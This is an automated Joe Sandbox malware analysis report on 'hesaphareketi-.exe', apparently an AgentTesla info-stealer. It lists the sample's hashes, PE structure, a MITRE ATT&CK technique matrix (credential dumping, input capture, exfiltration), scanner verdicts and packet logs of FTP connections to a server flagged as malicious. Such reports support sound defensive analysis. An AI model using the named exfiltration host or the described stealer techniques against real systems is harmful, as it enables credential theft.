Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 31 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Software Packing | NTDS | 111 Security Software Discovery | Distributed Component Object Model | 31 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
47% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
api.ipify.org | 104.26.12.205 | true | false | unknown | |
ftp.normagroup.com.tr | 104.247.165.99 | true | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false | |
104.247.165.99 | ftp.normagroup.com.tr | United States | 8100 | ASN-QUADRANET-GLOBALUS | true |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1446733 |
Start date and time: | 2024-05-23 20:25:12 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 8m 46s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | hesaphareketi-.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@3/1@2/2 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: hesaphareketi-.exe
Time | Type | Description |
---|---|---|
14:26:11 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.26.12.205 | Get hash | malicious | Stealit | Browse |
| |
Get hash | malicious | Stealit | Browse |
| ||
Get hash | malicious | Stealit | Browse |
| ||
Get hash | malicious | Stealit | Browse |
| ||
Get hash | malicious | Bunny Loader | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
104.247.165.99 | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | ||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
api.ipify.org | Get hash | malicious | AgentTesla | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer, XWorm | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
ftp.normagroup.com.tr | Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Remcos, DBatLoader | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Lokibot | Browse |
| ||
Get hash | malicious | MalLnk | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
ASN-QUADRANET-GLOBALUS | Get hash | malicious | AveMaria, GuLoader, PrivateLoader | Browse |
| |
Get hash | malicious | AveMaria, GuLoader, PrivateLoader | Browse |
| ||
Get hash | malicious | AveMaria, GuLoader, PrivateLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | AgentTesla | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer, XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | GuLoader, XWorm | Browse |
| ||
Get hash | malicious | GuLoader, XWorm | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | AsyncRAT, GuLoader | Browse |
|
Process: | C:\Users\user\Desktop\hesaphareketi-.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1216 |
Entropy (8bit): | 5.34331486778365 |
Encrypted: | false |
SSDEEP: | 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ |
MD5: | 1330C80CAAC9A0FB172F202485E9B1E8 |
SHA1: | 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492 |
SHA-256: | B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560 |
SHA-512: | 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
File type: | |
Entropy (8bit): | 6.960231532527883 |
TrID: |
|
File name: | hesaphareketi-.exe |
File size: | 939'008 bytes |
MD5: | 6ee05d4dd363d273ce38c497b1238db1 |
SHA1: | 7c4f86c5edfe9cf5d1955c4af44cd8d0a25a0f0a |
SHA256: | 1a88cd1b38768b690166ed6a6647ca7e975a68b7112c0e938cdfaaea8d509c9e |
SHA512: | db37e14f851f0d2de99cff71a720b72f12db0b388c60f0f89e83f2493364bf8bc72eb2a98dcae065c532a2541fc42ddb199d679b1dab91c6bc426925622e3709 |
SSDEEP: | 24576:6yK3B4Tw/bf4vQJTg4i0pMyR++/PhNt96WVp:6N94yU4i0WyD/36WV |
TLSH: | D0159F3C18FC2A229160D6A4CFE0C663F150F4FA3963992299D24755474BE9BBDC327E |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Nf..............0..J...........h... ........@.. ....................................@................................ |
Icon Hash: | 90cececece8e8eb0 |
Entrypoint: | 0x4e6816 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x664ED1A0 [Thu May 23 05:18:24 2024 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Instruction |
---|
jmp dword ptr [00402000h] |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe67c3 | 0x4f | .text |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe8000 | 0x5d4 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xea000 | 0xc | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xe4368 | 0x54 | .text |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x2000 | 0xe481c | 0xe4a00 | dd0a3e2c743e52eff1e39019c616add2 | False | 0.6967765428512849 | data | 6.966251395726089 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rsrc | 0xe8000 | 0x5d4 | 0x600 | a73137abe1e0968be14d0125539e9fe5 | False | 0.4283854166666667 | data | 4.148648565251091 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0xea000 | 0xc | 0x200 | 6d04a551d662569ede38cad17e04f668 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_VERSION | 0xe8090 | 0x344 | data | 0.4270334928229665 | ||
RT_MANIFEST | 0xe83e4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | 0.5489795918367347 |
DLL | Import |
---|---|
mscoree.dll | _CorExeMain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 23, 2024 20:26:13.593163967 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:13.593242884 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:13.593353033 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:13.601720095 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:13.601744890 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.195894003 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.196299076 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:14.200438023 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:14.200455904 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.200736046 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.242508888 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:14.258514881 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:14.302501917 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.441783905 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.441869974 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.442070007 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:14.450100899 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:15.761395931 CEST | 49734 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:26:15.766340971 CEST | 21 | 49734 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:26:15.766458035 CEST | 49734 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:26:15.784187078 CEST | 49734 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:26:15.835544109 CEST | 21 | 49734 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:26:15.837089062 CEST | 49734 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:27:47.133560896 CEST | 49744 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:27:47.138602018 CEST | 21 | 49744 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:27:47.138734102 CEST | 49744 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:27:47.138840914 CEST | 49744 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:27:47.182372093 CEST | 21 | 49744 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:27:47.182492018 CEST | 49744 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:01.189251900 CEST | 49745 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:01.194561958 CEST | 21 | 49745 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:01.197756052 CEST | 49745 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:01.197854996 CEST | 49745 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:01.254194021 CEST | 21 | 49745 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:01.254508972 CEST | 49745 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:08.366137028 CEST | 49746 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:08.372268915 CEST | 21 | 49746 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:08.372361898 CEST | 49746 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:08.372647047 CEST | 49746 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:08.426268101 CEST | 21 | 49746 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:08.426516056 CEST | 49746 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:13.202949047 CEST | 49747 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:14.146158934 CEST | 21 | 49747 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:14.146230936 CEST | 49747 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:14.146580935 CEST | 49747 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:14.156047106 CEST | 21 | 49747 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:14.156096935 CEST | 49747 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:15.234893084 CEST | 49748 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:15.241636038 CEST | 21 | 49748 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:15.241738081 CEST | 49748 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:15.241967916 CEST | 49748 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:15.298125982 CEST | 21 | 49748 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:15.298660040 CEST | 49748 | 21 | 192.168.2.4 | 104.247.165.99 |
